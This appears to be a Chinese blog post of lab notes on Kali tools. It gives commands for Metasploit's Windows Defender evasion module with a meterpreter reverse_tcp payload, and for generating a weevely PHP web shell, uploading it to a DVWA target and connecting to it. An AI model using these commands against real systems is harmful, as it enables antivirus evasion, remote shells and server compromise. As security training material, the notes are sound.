当前位置:网站首页>kali里的powersploit、evasion、weevely等工具的杂项记录
kali里的powersploit、evasion、weevely等工具的杂项记录
2022-07-28 20:05:00 【angleoldhen】
在kali菜单项里的Post Exploitation(后渗透)里的OS Backdoors可以找到该工具
点击后其实是进入一个目录

然后利用python启动一个WEB服务器

在win测试机上启动power shell,同时打开一个浏览器,输入http://kali的IP:8000

msf框架里的evasion
- msfconsole
- show evasion // 查看免杀模块

- use evasion/windows/windows_defender_exe
- show options // 查看参数

- set filename test.exe //自己定义一个文件名,不然是随机起名
- set payload windows/meterpreter/reverse_tcp
- run

这是一个隐藏目录
可以使用命令

将文件移动到可视位置
学习时可以扔到https://www.virscan.org等平台检测一下
weevely只能生成PHP的网页木马 在kali里执行
weevely generate 123456 /home/kali/test.php
其中123456是密码

到靶机dvwa上传

上传成功后,根据页面提示的路径访问一下木马网页
![]()
回到kali,执行
- weevely http://192.168.107.130/dvwa/hackable/uploads/test.php 123456
- 密码要放在最后,且须与前面设置的一致

输入 help 查看可用的远程操作的命令

边栏推荐
- 世界肝炎日 | 基层也能享受三甲资源,智慧医疗系统如何解决“看病难”?
- [geek challenge 2019] secret file & file contains common pseudo protocols and gestures
- 作价11.5亿元,1206件设备注入合资公司!SK海力士抢食大陆晶圆代工市场!
- 传微软已获得向华为供货许可!华为将迎来全面解禁?
- Mysql的B+树高度计算
- Discussion: if you want to land Devops, is it enough to only consider a good PAAS container platform?
- C process control statement
- Have you ever seen this kind of dynamic programming -- the stock problem of state machine dynamic programming (Part 2)
- C语言入门【详细】
- 瑞典法院取消对华为和中兴的5G频谱拍卖禁令
猜你喜欢

基于知识元的外文专利文献知识描述框架
![[geek challenge 2019] secret file & file contains common pseudo protocols and gestures](/img/aa/a169cdd8cc6cdfda6d2777511b4dd2.png)
[geek challenge 2019] secret file & file contains common pseudo protocols and gestures

Log slimming operation: how to optimize from 5g to 1g! (glory Collection Edition)

Pytorch学习记录(三):随机梯度下降、神经网络与全连接

Research on intangible cultural heritage image classification based on multimodal fusion
![[Bluetooth Bluetooth development] VIII. Transmission layer of ble protocol](/img/43/7c3891befcb7cbb7dc67dfdeb763e2.png)
[Bluetooth Bluetooth development] VIII. Transmission layer of ble protocol
![Leetcode 19. delete the penultimate node of the linked list [knowledge points: speed pointer, recursion, stack]](/img/86/c74a63c3465efbed74c2bf059bac4f.jpg)
Leetcode 19. delete the penultimate node of the linked list [knowledge points: speed pointer, recursion, stack]

Leetcode linked list question - interview question 02.07. linked list intersection (learn linked list by one question and one article)

Chinese patent keyword extraction based on LSTM and logistic regression
![Leetcode 142. circular linked list II [knowledge points: speed pointer, hash table]](/img/74/321a4a0fab0b0dbae53b2ea1faf814.png)
Leetcode 142. circular linked list II [knowledge points: speed pointer, hash table]
随机推荐
Top level "redis notes", cache avalanche + breakdown + penetration + cluster + distributed lock, Nb
ST法国三座工厂大罢工,芯片缺货情况或将更加严重!
比UUID更快更安全NanoID到底是怎么实现的?(荣耀典藏版)
Uniapp progress bar customization
First week of internship diary
日志瘦身神操作:从5G优化到1G到底是怎么做到的!(荣耀典藏版)
Leetcode interview question 02.07. Linked list intersection [knowledge points: Double pointers, stack]
蚂蚁集团境外站点 Seata 实践与探索
Research on intangible cultural heritage image classification based on multimodal fusion
Hold high the two flags of 5g and AI: Ziguang zhanrui Market Summit is popular in Shencheng
Kubedm builds kubernetes cluster
For the 1000 yuan 5g mobile phone market, MediaTek Tianji 700 released
基于Paragraph-BERT-CRF的科技论文摘要语步功能信息识别方法研究
物联网技术栈之网关技术
凡尔赛天花板:“毕业两年月薪才35K,真是没出息啊~~”
LT7911D Type-C/DP转mipi 方案成熟可提供技术支持
Four methods of multi-threaded sequential operation. Ask casually during the interview
Meeting notice of OA project (Query & whether to attend the meeting & feedback details)
OA项目之会议通知(查询&是否参会&反馈详情)
HCIA综合实验(以华为eNSP为例)